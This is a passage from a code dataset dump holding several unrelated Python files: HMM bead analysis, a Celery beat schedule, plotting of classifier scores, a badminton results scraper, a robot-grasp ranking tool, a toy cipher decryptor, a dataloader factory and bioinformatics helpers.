hmm_outputs_module.composite_bead(data,\n max_num_bins_bead,\n background_mean_counts,\n changepoint_index,\n num_iterations,\n num_for_bead_geometric)\n stats_all_transitions = hmm_outputs_module.statistics_all_transitions(changepoint_index, bin_width)\n row, final_info_array, array_of_composite_bead_arrays = hmm_outputs_module.add_to_holding_arrays(smoothers, viterbi, row,\n final_info_array,\n array_of_composite_bead_arrays,\n stats_all_transitions,\n bin_width,\n concentration,\n num_photons_subset,\n loglikelihood,\n matrixA,\n arrayMeanCounts,\n num_beads_array,\n num_iterations,\n max_iterations,\n num_for_bead_geometric,\n composite_bead_array)\n\n return row, final_info_array, array_of_composite_bead_arrays\n\ndef find_beads_detected_in_background_simulation(num_data_points, bin_width, row_b, arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, smoothers, viterbi, n, max_num_bins_bead, final_info_array, array_of_composite_bead_arrays, num_for_bead_geometric, concentration, fraction_of_photons_for_subset, max_iterations):\n print(\"Find Beads Detected in Background Simulation\")\n total_iterations = len(arrayMeanCounts_alliters)\n for i in range(total_iterations):\n arrayPi = arrayPi_alliters[i]\n arrayMeanCounts = arrayMeanCounts_alliters[i]\n matrixA = matrixA_alliters[i]\n\n num_iterations = i + 1\n\n time, background = hmm_simulation_module.simulate_background(arrayMeanCounts[0], num_data_points, bin_width)\n\n forward_likelihood, backwards_likelihood, loglikelihood = hmm_forward_backwards_module.run_algorithms_scaled_for_numba(len(arrayMeanCounts), len(background), background, arrayPi, matrixA, arrayMeanCounts)\n\n row_b, final_info_array, array_of_composite_bead_arrays = decode_changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, n, forward_likelihood,\n backwards_likelihood, time, background, max_num_bins_bead,\n arrayMeanCounts[0], row_b, final_info_array,\n array_of_composite_bead_arrays, bin_width,\n concentration, fraction_of_photons_for_subset, loglikelihood,\n matrixA, arrayMeanCounts, arrayPi,\n num_iterations, max_iterations,\n num_for_bead_geometric)\n\n return final_info_array, array_of_composite_bead_arrays, background, row_b\n\ndef get_composite_bead_from_simulation(row, array_of_composite_bead_arrays_sim, array_of_num_beads_array, matrixA, arrayMeanCounts, time, num_for_bead_geometric, max_num_bins_bead):\n print(\"Composite Bead from Simulation\")\n total_iterations = len(arrayMeanCounts)\n for i in range(total_iterations):\n num_iterations = i + 1\n row1 = int(row/2) - total_iterations + i\n state, data = hmm_simulation_module.simulation(matrixA[i], arrayMeanCounts[i], len(time))\n changepoint_index = hmm_changepoints_module.get_changepoint_time_index_direction(state, time)\n all_beads_plus_dwell, composite_bead_array, num_beads_array = hmm_outputs_module.composite_bead(data, max_num_bins_bead, arrayMeanCounts[i, 0], changepoint_index, num_iterations, num_for_bead_geometric)\n array_of_composite_bead_arrays_sim = hmm_outputs_module.add_composite_bead_to_array(0, 0, row1, array_of_composite_bead_arrays_sim, composite_bead_array)\n num_beads_array = np.append(num_beads_array, np.array([num_iterations, num_for_bead_geometric]))\n array_of_num_beads_array[row1, :] = num_beads_array\n\n return array_of_num_beads_array, array_of_composite_bead_arrays_sim, data\n","sub_path":"hmm_analysis_module.py","file_name":"hmm_analysis_module.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"382208929","text":"from __future__ import absolute_import, unicode_literals\nimport os\nfrom celery import Celery\nfrom celery.schedules import crontab\n\n# set the default Django settings module for the 'celery' program. Should be the same as in wsgi.py\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dj_time_tasks.settings')\n\napp = Celery('proj')\n\n# Using a string here means the worker don't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Load task modules from all registered Django app configs.\napp.autodiscover_tasks()\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print('Request: {0!r}'.format(self.request))\n\n\napp.conf.beat_schedule = {\n 'every-minute': {\n 'task': 'rand_quote',\n 'schedule': crontab()\n # 'args': (16, 16),\n },\n 'every-5-seconds': {\n 'task': 'multiply_two_numbers',\n 'schedule': 5.0,\n 'args': (16, 16)\n },\n 'delete-every-5-seconds': {\n 'task': 'delete_invoice',\n 'schedule': 5.0,\n },\n # 'add-every-3-seconds': {\n # 'task': 'tasks.add',\n # 'schedule': 3.0,\n # 'args': (16, 16)\n # },\n}","sub_path":"dj_time_tasks/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"646722974","text":"\n\nfrom xai.brain.wordbase.verbs._transmit import _TRANSMIT\n\n#calss header\nclass _TRANSMITS(_TRANSMIT, ):\n\tdef __init__(self,): \n\t\t_TRANSMIT.__init__(self)\n\t\tself.name = \"TRANSMITS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"transmit\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_transmits.py","file_name":"_transmits.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"580938434","text":"import os\nfrom plotnine import ggplot, aes, geom_boxplot, labs, theme, element_text, facet_wrap, facet_grid, geom_violin, ggtitle\nfrom plotnine.themes.elements import Margin\n\nfrom config import Config\nimport pandas as pd\nfrom projects import ProjectName\n\nprojects = list(map(lambda x: x.github(), list(ProjectName)))\nworking_projects = dict()\nfor project in projects:\n try:\n designite_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite\", project, \"scores.csv\"))\n designite_scores_df = pd.read_csv(designite_scores_path)\n designite_scores_df['dataset'] = 'Designite'\n designite_scores_df['project'] = project\n\n fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"fowler\", project, \"scores.csv\"))\n fowler_scores_df = pd.read_csv(fowler_scores_path)\n fowler_scores_df['dataset'] = 'Fowler'\n fowler_scores_df['project'] = project\n\n # traditional_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"traditional\", project, \"scores.csv\"))\n # traditional_scores_df = pd.read_csv(traditional_scores_path)\n # traditional_scores_df['dataset'] = 'Traditional'\n # traditional_scores_df['project'] = project\n\n traditional_fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"fowler_traditional\", project, \"scores.csv\"))\n traditional_fowler_scores_df = pd.read_csv(traditional_fowler_scores_path)\n traditional_fowler_scores_df['dataset'] = 'Traditional +\\n Fowler'\n traditional_fowler_scores_df['project'] = project\n\n # traditional_designite_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"traditional_designite\", project, \"scores.csv\"))\n # traditional_designite_scores_df = pd.read_csv(traditional_designite_scores_path)\n # traditional_designite_scores_df['dataset'] = 'Traditional +\\n Designite'\n # traditional_designite_scores_df['project'] = project\n\n designite_fowler_scores_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite_fowler\", project, \"scores.csv\"))\n designite_fowler_scores_df = pd.read_csv(designite_fowler_scores_path )\n designite_fowler_scores_df['dataset'] = 'Designite +\\n Fowler'\n designite_fowler_scores_df['project'] = project\n\n traditional_designite_fowler_path = Config.get_work_dir_path(os.path.join(\"paper\", \"analysis\", \"designite_fowler_traditional\", project, \"scores.csv\"))\n traditional_designite_fowler_scores_df = pd.read_csv(traditional_designite_fowler_path)\n traditional_designite_fowler_scores_df['dataset'] = 'Traditional +\\n Designite +\\n Fowler'\n traditional_designite_fowler_scores_df['project'] = project\n\n datasets = [\n designite_scores_df,\n fowler_scores_df,\n # traditional_scores_df,\n traditional_fowler_scores_df,\n # traditional_designite_scores_df,\n designite_fowler_scores_df,\n traditional_designite_fowler_scores_df\n ]\n\n scores_df = pd.concat(datasets, ignore_index=True)\n working_projects[project] = scores_df\n except Exception:\n continue\n\nscore_types = [\"precision\", \"recall\", \"f1-measure\", \"auc-roc\", \"brier score\"]\nfeatures_methods = [\"all\", \"chi2_20p\", \"chi2_50p\", \"f_classif_20\", \"f_classif_50\", \"mutual_info_classif_20p\", \"mutual_info_classif_50p\", \"recursive_elimination\", \"mutual_info_classif_50p\", \"recursive_elimination\"]\ncalculations = [\"mean\", \"max\"]\n\nfor score_type in score_types:\n for features_method in features_methods:\n for calculation in calculations:\n scores_df = pd.concat(list(map(lambda x: x.drop(['estimator', 'configuration'], axis=1)\n .groupby(['dataset', 'feature_selection'])\n .aggregate({score_type: calculation})\n .reset_index(), working_projects.values())))\n scores = scores_df.loc[scores_df['feature_selection'] == features_method]\n\n g = (ggplot(scores,\n aes(x='dataset',\n y=score_type))\n + geom_violin()\n + geom_boxplot(width=0.2)\n + labs(title=\"{0} Score with features from {1}\".format(score_type.capitalize(), features_method.capitalize()),\n x=\"Score Measure: {}\".format(score_type.capitalize()),\n y=\"Feature Selection Method: {}\".format(features_method.capitalize()))\n + theme(\n plot_title=element_text(size=30, lineheight=.8, vjust=1,\n family=\"Fira Code\", face=\"bold\", margin={'b': 25}),\n axis_text_x=element_text(size=15, family=\"Fira Code\"),\n axis_text_y=element_text(size=15, family=\"Fira Code\"),\n axis_title_x=element_text(size=20, family=\"Fira Code\"),\n axis_title_y=element_text(size=20, family=\"Fira Code\")\n )\n )\n pdf_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"pdf\"))\n png_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"png\"))\n csv_dir = Config.get_work_dir_path(os.path.join(\"paper\", \"graphics\", \"ggplot\", \"images\", \"csv\"))\n Config.assert_dir_exists(pdf_dir)\n Config.assert_dir_exists(png_dir)\n Config.assert_dir_exists(csv_dir)\n formatted_score_type = score_type.replace(\" \", \"_\")\n formatted_score_type = formatted_score_type.replace(\" \", \"_\")\n pdf_path = os.path.join(pdf_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, calculation))\n png_path = os.path.join(png_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, calculation))\n csv_path = os.path.join(csv_dir, \"{0}_{1}_{2}\".format(formatted_score_type, features_method, calculation))\n g.save(pdf_path, width=50, height=28.12, units=\"cm\")\n g.save(png_path, width=50, height=28.12, units=\"cm\")\n scores_df.to_csv(csv_path, index=False)\n","sub_path":"paper/graphics/ggplot/create_graphs.py","file_name":"create_graphs.py","file_ext":"py","file_size_in_byte":6304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"358798848","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport re\n\ndef get_soup(url_link):\n req = Request(url_link, headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n soup_html = BeautifulSoup(webpage, 'html.parser') \n return soup_html\n\ndef game_score_array_single(game_score, match_soup):\n # Player 1 id\n p1_chunk = match_soup.findAll('div', {'class':'player1-name'})\n if len(p1_chunk)==1:\n url_p1 = re.search('href=\"(.*)\">', str(p1_chunk)).group(1)\n p1_split = url_p1.split('/')\n p1_pid = p1_split[4]\n else:\n p1_pid=''\n\n # Player 2 id\n p2_chunk = match_soup.findAll('div', {'class':'player2-name'})\n if len(p2_chunk)==1:\n url_p2 = re.search('href=\"(.*)\">', str(p2_chunk)).group(1)\n p2_split = url_p2.split('/')\n p2_pid = p2_split[4]\n else:\n p2_pid=''\n \n game_det = match_soup.findAll('div', {'class':'game-completed-wrap'}) \n games_played = len(game_det)\n for c, games in enumerate(game_det, 1):\n games_split = games.find_all('div')\n p1_score = games_split[2].text\n p1_score = p1_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n p2_score = games_split[4].text\n p2_score = p2_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n scores = {\n 't_id': tourney_id,\n 't_date': tourney_date,\n 'games_played': games_played,\n 'p1a_pid': p1_pid,\n 'p1b_pid': '',\n 'p2a_pid': p2_pid,\n 'p2b_pid': '',\n 'game': c,\n 'p1_score': p1_score,\n 'p2_score': p2_score}\n game_score.append(scores) \n return game_score\n\ndef game_score_array_double(game_score, match_soup):\n \n # Player 1 id \n p1_chunk = match_soup.findAll('div', {'class':'player1-name'}) \n if len(p1_chunk)==2: \n url_p1a = re.findall('href=\"(.*)\">', str(p1_chunk))[0]\n url_p1b = re.findall('href=\"(.*)\">', str(p1_chunk))[1] \n p1_split = url_p1a.split('/')\n p1a_pid = p1_split[4] \n p1_split = url_p1b.split('/')\n p1b_pid = p1_split[4]\n else:\n p1a_pid=''\n p1b_pid=''\n\n # Player 1 id \n p2_chunk = match_soup.findAll('div', {'class':'player2-name'}) \n if len(p2_chunk)==2: \n url_p2a = re.findall('href=\"(.*)\">', str(p2_chunk))[0]\n url_p2b = re.findall('href=\"(.*)\">', str(p2_chunk))[1] \n p2_split = url_p2a.split('/')\n p2a_pid = p2_split[4] \n p2_split = url_p2b.split('/')\n p2b_pid = p2_split[4]\n else:\n p2a_pid=''\n p2b_pid=''\n \n game_det = match_soup.findAll('div', {'class':'game-completed-wrap'}) \n games_played = len(game_det)\n for c, games in enumerate(game_det, 1):\n games_split = games.find_all('div')\n p1_score = games_split[2].text\n p1_score = p1_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n p2_score = games_split[4].text\n p2_score = p2_score.replace(\"\\t\",\"\").replace(\"\\n\",\"\")\n scores = {\n 't_id': tourney_id,\n 't_date': tourney_date,\n 'games_played': games_played,\n 'p1a_pid': p1a_pid,\n 'p1b_pid': p1b_pid,\n 'p2a_pid': p2a_pid,\n 'p2b_pid': p2b_pid,\n 'game': c,\n 'p1_score': p1_score,\n 'p2_score': p2_score}\n game_score.append(scores) \n return game_score\n\n# Load tourney list\ntourney_list = pd.read_csv('../../data/01_raw/tournament_year.csv', sep=\"|\")\n\nt_step = 1947\nurl_hit = 'https://bwfbadminton.com/results/1947/china-masters-gpg-2014/2014-04-17'\ni = 2\n\n#for t_step in range(47, len(tourney_list)):\nfor t_step in (range(734,47,-1)):\n game_score = []\n print(\"Tourney \" + str(t_step+1) + \" of \" + str(len(tourney_list)))\n url_hit = tourney_list['t_web_link'][t_step]\n print(url_hit)\n if url_hit != 'none': \n url_split = url_hit.split('/')\n tourney_id = url_split[4]\n \n # Hit podium page of tourney \n soup_html = get_soup(url_hit+'podium')\n ajax_table = soup_html.findAll('div', attrs={'class':'wrapper-content-results'}) \n ajax_el = ajax_table[0].findAll('ul', attrs={'class':'content-tabs'}) \n href_split = ajax_el[0].findAll('a', href=True)\n \n # All tournament days\n for i in range(1,len(href_split)-1):\n print(\"Day \" + str(i) + \" of \" + str(len(href_split)))\n get_id = str(href_split[i])\n # Url page of day i-th of tourney\n url_day = re.search('href=\"(.*)\">', get_id).group(1)\n day_soup = get_soup(url_day)\n game_table = day_soup.findAll('ul', attrs={'class':'list-sort-time'}) \n if len(game_table) != 0:\n game_table_split = game_table[0].find_all('li')\n \n game_count=1\n for get_game_details in range(1, len(game_table_split), 2):\n print(\"Game \" + str(game_count) + \" of \" + str(len(game_table_split)/2))\n game_count+=1\n get_id = str(game_table_split[get_game_details])\n if re.search('href=\"(.*)\">', get_id) is not None: \n url_match = re.search('href=\"(.*)\" id', get_id).group(1)\n url_match = url_match.replace(\"&\", \"&\") \n match_soup = get_soup(url_match)\n \n get_date = url_match.split('/')\n tourney_date = get_date[6]\n \n check_match_type = match_soup.findAll('div', {'class':'player1-name'})\n \n if len(check_match_type) == 2:\n match_type='doubles'\n game_score = game_score_array_double(game_score, match_soup)\n else:\n match_type='singles'\n game_score = game_score_array_single(game_score, match_soup) \n\n tourney_scores_df = pd.DataFrame(game_score) \n filename = \"../../data/01_raw/tourney_details_{}.csv\".format(tourney_id)\n tourney_scores_df.to_csv(filename, index=False, sep='|', header=True)","sub_path":"munge/01_raw/06_tourney_details.py","file_name":"06_tourney_details.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522607640","text":"import os\nimport cv2\nimport numpy as np\nimport random\nfrom vgt2 import find_contact_region, get_outline_and_normal\nfrom visulize_trajectory import plot_grasp_path\n\n\ndef get_object_pixels(mask_img):\n object_pixels = []\n r, c = mask_img.shape\n for i in range(r):\n for j in range(c):\n if mask_img[i, j] == 1:\n object_pixels.append([i, j])\n return object_pixels\n\n\ndef grasp_features(contact_region, outline_pixels, normals, gripper_center, theta): # gripper_center(row,col)\n \"\"\"\n\n :param contact_region: nx[row,col,side]\n :param outline_pixels:\n :param normals: nx[row0,col0,row1,col1]\n :param gripper_center: [row,col]\n :param theta: gripper roll\n :return: x_loss, y_loss, theta_loss\n \"\"\"\n normal_sum = np.array([0.0, 0.0])\n vector_sum = np.array([0.0, 0.0])\n left_sum = np.array([0.0, 0.0])\n right_sum = np.array([0.0, 0.0])\n gripper_center = np.array(gripper_center)\n if contact_region.shape[0] > 60:\n for contact_marker in contact_region:\n contact = outline_pixels[contact_marker[0]]\n vector_sum += contact - gripper_center # [row, col]\n normal_sum += normals[contact_marker[0]]\n if contact_marker[1] == 0:\n # left side\n left_sum += normals[contact_marker[0]] # [row, col]\n else:\n # right side\n right_sum += normals[contact_marker[0]] # [row, col]\n x_loss = (vector_sum[0] ** 2 + vector_sum[1] ** 2)**0.5\n y_loss = (normal_sum[0] ** 2 + normal_sum[1] ** 2)**0.5\n r_normal = np.array([np.sin(np.deg2rad(theta)), np.cos(np.deg2rad(theta))]) # [row, col]\n l_normal = np.array([-np.sin(np.deg2rad(theta)), -np.cos(np.deg2rad(theta))]) # [row, col]\n if left_sum.all() == 0:\n alpha = 180\n beta = 180\n elif right_sum.all() == 0:\n beta = 180\n alpha = 180\n else:\n c_alpha = np.dot(l_normal, left_sum) / (left_sum[0]**2+left_sum[1]**2)**0.5\n c_beta = np.dot(r_normal, right_sum) / (right_sum[0]**2 + right_sum[1]**2)**0.5\n alpha = np.rad2deg(np.arccos(c_alpha))\n beta = np.rad2deg(np.arccos(c_beta))\n theta_loss = alpha + beta\n return x_loss, y_loss, theta_loss\n else:\n return -1, -1, -1\n\n\ndef gather_data(mask_img, obj_pt, center_id, grasp_angles):\n outline_pixels, outline_normals, index_array = get_outline_and_normal(mask_img[:, :, 0], 0, 0, 7)\n results = np.ndarray((0, 7), dtype=np.float16)\n # interrupted = False\n for i in center_id:\n # if interrupted:\n # break\n for a in grasp_angles:\n # x = input('press q to quit...')\n # if x == 'q':\n # interrupted = True\n # break\n contact = find_contact_region(outline_pixels, index_array, obj_pt[i], a)\n l1, l2, l3 = grasp_features(contact, outline_pixels, outline_normals, obj_pt[i], a)\n data = [0, obj_pt[i][0], obj_pt[i][1], a, l1, l2, l3] # current grasp data\n if results.size == 0:\n new_results = np.append(results, [data], axis=0)\n # add first one\n else:\n left = 0\n right = len(results) - 1\n\n ci = results[left]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {left}')\n usr_input = cv2.waitKeyEx(0)\n cv2.destroyAllWindows()\n if usr_input == 2424832:\n # case 3\n print('left side is better')\n cv2.destroyAllWindows()\n ci = results[right]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {right}')\n usr_input = cv2.waitKeyEx(0)\n cv2.destroyAllWindows()\n if usr_input == 2555904:\n # case 31\n print('right side is better')\n while True:\n mid = int((left + right) / 2)\n if mid == left:\n print(f'left {left}, right {right}')\n data[0] = results[right, 0]\n results[right:, 0] += 1\n new_results = np.concatenate([results[:right], [data], results[right:]])\n break\n else:\n ci = results[mid]\n img1 = np.copy(mask_img*255)\n img2 = np.copy(mask_img*255)\n plot_grasp_path(obj_pt[i], a, 19, 130, img1)\n plot_grasp_path([int(round(ci[1])), int(round(ci[2]))], ci[3], 19, 130, img2)\n img3 = cv2.hconcat([img1, img2])\n img3_s = cv2.resize(img3, (1280, 400))\n cv2.imshow('choose the better grasp', img3_s)\n print(f'compare with {mid}')\n usr_input = cv2.waitKeyEx(0)\n cv2.destroyAllWindows()\n if usr_input == 2424832:\n print('left side is better')\n left = mid\n elif usr_input == 2555904:\n print('right side is better')\n right = mid\n else:\n print('same quality')\n data[0] = ci[0]\n better_side = mid\n for n in range(mid, len(results)):\n if results[n, 0] > ci[0]:\n better_side = n\n break\n results[better_side:, 0] += 1\n new_results = np.concatenate([results[:mid], [data], results[mid:]])\n break\n\n elif usr_input == 2424832:\n # case 32\n print('current pose is the best so far')\n data[0] = ci[0] + 1 # update grasp quality\n new_results = np.concatenate([results, [data]]) # add current grasp to the array\n else:\n # case 33\n print('current pose is equally good as the best one')\n data[0] = ci[0]\n new_results = np.concatenate([results, [data]])\n\n elif usr_input == 2555904:\n print('right side is better')\n # case 1\n results[:, 0] += 1 # update grasp quality of all grasps that are better that current grasp\n new_results = np.concatenate([[data], results]) # add current grasp to the array\n else:\n # case 2\n print('same grasp quality')\n new_results = np.concatenate([[data], results])\n\n results = new_results\n print(results.shape)\n np.savetxt('grasp_feature_study.txt', results, fmt='%1.4f')\n return results\n\n\nif __name__ == '__main__':\n path = os.path.dirname(os.getcwd())\n img_rgb = 'spoon3.png'\n img_mask = 'spoon3_mask.png'\n I = cv2.imread(os.path.join(path, 'pictures', img_rgb))\n Im = cv2.imread(os.path.join(path, 'pictures', img_mask))\n Ip = get_object_pixels(Im[:, :, 0])\n while True:\n sample_indices = random.sample(range(len(Ip)), 20)\n sample_check = np.copy(Im)*255\n for ii in sample_indices:\n cv2.circle(sample_check, (Ip[ii][1], Ip[ii][0]), 2, (0, 0, 255))\n cv2.imshow('sample check', sample_check)\n print('press k if the sample is good')\n xx = cv2.waitKey(0)\n cv2.destroyAllWindows()\n if xx == ord('k') or xx == ord('K'):\n break\n sample_angles = np.arange(-90, 90, 10)\n\n gf_data = gather_data(Im, Ip, sample_indices, sample_angles)\n np.savetxt('grasp_feature_study.txt', gf_data, fmt='%1.4f')\n\n # arr = np.arange(9).reshape((3, 3))\n # new_arr = np.concatenate([arr[:2], [[8,3,3]], arr[2:]])\n # print(new_arr)\n\n # path = os.path.dirname(os.getcwd())\n # img_rgb = 'spoon3.png'\n # img_mask = 'spoon3_mask.png'\n # I = cv2.imread(os.path.join(path, 'pictures', img_rgb))\n # print('press a key')\n # cv2.imshow('test', I)\n # c = cv2.waitKeyEx(0)\n # print('you pressed', c)\n # if c == 2621440:\n # print('you pressed down')\n # if c == 2424832:\n # print('you pressed left')\n # if c == 2555904:\n # print('you pressed '\n # 'right')","sub_path":"daniel/Grasp_Tuning/code/grasp_feature_test.py","file_name":"grasp_feature_test.py","file_ext":"py","file_size_in_byte":9837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"119494283","text":"def Decryption(string): #Encrypted String -> string\r\n\t\r\n\tfile = open(\"Library/decrypted.txt\",\"r\") #Retrieves a string of letters, which are in order: abcdefg...\r\n\tDC = file.read()\r\n\tfile.close()\r\n\t\r\n\tfile = open(\"Library/encrypted.txt\",\"r\") #Retrieves a string of letters, which are in random order: the encryption key\r\n\tEC = file.read()\r\n\tfile.close()\r\n\t\r\n\tstringLength = len(string) #Length of the string\r\n\tlength = len(EC) #Number of characters in the key\r\n\tindex = 0 #Sets index to 0, in order to start from the first character\r\n\tdecryptedString = \"\"\r\n\taddition = 0\r\n\r\n\twhile index != stringLength: #Will repeat until entire string is handeled\r\n\r\n\t\tstringLetter = string[index] #Takes the index letter\r\n\r\n\t\tspot = EC.index(stringLetter) #Finds the index of the letter in the key\r\n\r\n\t\tdecryptedLetter = DC[(spot + addition) % length] #Finds the letter in the order that corresponds to the index of the letter in the key. Reverses encryption\r\n\r\n\t\tindex = index + 1 #Continues to the next letter\r\n\t\taddition = addition - 1 #Allows reversing the encryption\r\n\r\n\t\tdecryptedString = decryptedString + decryptedLetter #Adds the decrypted letter to the string\r\n\t\r\n\treturn(decryptedString) #Returns the decrypted string \r\n\t\r\n\r\nprint(\"\\nString Decryption\")\r\nprint(\"-----------------\")\r\nprint(Decryption(input(\"Text:\")))\r\n","sub_path":"Decryption.py","file_name":"Decryption.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"16514657","text":"\"\"\"create dataset and dataloader\"\"\"\nimport logging\nimport torch\nimport torch.utils.data\n\n\ndef create_dataloader(dataset, dataset_opt, opt=None, sampler=None):\n phase = dataset_opt['phase']\n if phase == 'train':\n num_workers = dataset_opt['n_workers'] * len(opt['gpu_ids'])\n batch_size = dataset_opt['batch_size']\n # shuffle = True\n shuffle = dataset_opt['use_shuffle']\n return torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle,\n num_workers=num_workers, sampler=sampler,\n pin_memory=True)\n else:\n batch_size = dataset_opt['batch_size']\n # shuffle = dataset_opt['use_shuffle']\n shuffle = False\n return torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0,\n pin_memory=False)\n\n\ndef create_dataset(opt,dataset_opt):\n mode = dataset_opt['mode']\n # datasets for image restoration\n if mode == 'SIEN_train':\n from data.SIEN_dataset import DatasetFromFolder as D\n\n dataset = D(upscale_factor=opt['scale'], data_augmentation=dataset_opt['augment'],\n group_file=dataset_opt['filelist'],\n patch_size=dataset_opt['IN_size'], black_edges_crop=False, hflip=True, rot=True)\n\n elif mode == 'SIEN_val':\n from data.SIEN_dataset import DatasetFromFolder as D\n dataset = D(upscale_factor=opt['scale'], data_augmentation=False,\n group_file=dataset_opt['filelist'],\n patch_size=None, black_edges_crop=False, hflip=False, rot=False)\n\n else:\n raise NotImplementedError('Dataset [{:s}] is not recognized.'.format(mode))\n\n\n logger = logging.getLogger('base')\n logger.info('Dataset [{:s} - {:s}] is created.'.format(dataset.__class__.__name__,\n dataset_opt['name']))\n return dataset\n","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278873972","text":"N, M = map(int, input().split())\nA = list(map(int, input().split()))\n\nA = sorted(A)\n\n#番兵追加\nA.insert(0, 0)\nA.append(N+1)\n\nans = 0\nwhite_box = []\nfor i in range(M+1):\n box_length = A[i+1]-A[i]-1\n if (box_length != 0):\n white_box.append(box_length)\n\ntry:\n k = min(white_box)\nexcept ValueError:\n print(ans)\n exit()\n\nfor j in white_box:\n ans += -(-j // k)\nprint(ans)\n","sub_path":"python/Stamp.py","file_name":"Stamp.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368903200","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 31 16:50:13 2017\n\n@author: Owner\n\"\"\"\n#Functions\n############################################################################### \nimport random\nimport math\nimport networkx as nx\n\ndef WriteResults(list):\n \"\"\"writes out elements of a list to text\"\"\"\n with open(\"Output.txt\", \"w\") as text_file:\n for j in range(len(list)):\n text_file.write(str(list[j]) + \"\\n\") \n text_file.close()\n \ndef readFasta(fileName):\n f = open(fileName)\n seqs = {}\n for line in f:\n line = line.rstrip()\n if line[0] == '>':\n words = line.split()\n name = words[0][1:]\n seqs[name] = ''\n else:\n seqs[name] = seqs[name] + line\n f.close()\n return seqs\n \ndef readSequenceArray(fileName):\n f = open(fileName)\n seqs = []\n for line in f:\n line = line.rstrip()\n seqs.append(line)\n f.close()\n return seqs\n \ndef readGapSeparatedSequenceArray(fileName):\n f = open(fileName)\n seqs = []\n for line in f:\n line = line.rstrip()\n lines = line.split(' ')\n for l in lines:\n seqs.append(l)\n f.close()\n return seqs\n \ndef getLongestSequenceInFasta(dic):\n maxLength = 0\n longest = 0\n for k, v in dic.items():\n longest = len(v)\n if longest > maxLength:\n maxLength = longest\n return maxLength\n \ndef getsequenceLengthsInFasta(dic):\n sequenceL = []\n for k, v in dic.items():\n sequenceL.append(len(v)) \n return sequenceL \n\ndef getLengthsDicInFasta(dic):\n sequenceL = {}\n for k, v in dic.items():\n l = len(v)\n sequenceL.update({k:l}) \n return sequenceL \n\n\ndef reverseComplement(s):\n \"\"\"computes the reverse complement of a DNA string\"\"\"\n complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}\n t = ''\n for base in s:\n t = complement[base] + t\n return t\n\n\ndef create_dna(n, alphabet='acgt'):\n \"\"\"creates a random string of DNA\"\"\"\n return ''.join([random.choice(alphabet) for i in range(n)])\n \ndef naive(p, t):\n #Given a DNA sequence (t) search for the number of occurences of an exact \n #match (p)\n occurrences = []\n for i in range(len(t) - len(p) + 1): # loop over alignments\n match = True\n for j in range(len(p)): # loop over characters\n if t[i+j] != p[j]: # compare characters\n match = False\n break\n if match:\n occurrences.append(i) # all chars matched; record\n return occurrences \n \ndef kmerCount(k,t):\n #Counts the number if occurences if a k-mer in a dna sequence (naive)\n d = {}\n occurrences = []\n count = 0\n for j in range(len(t) - k + 1):\n p = 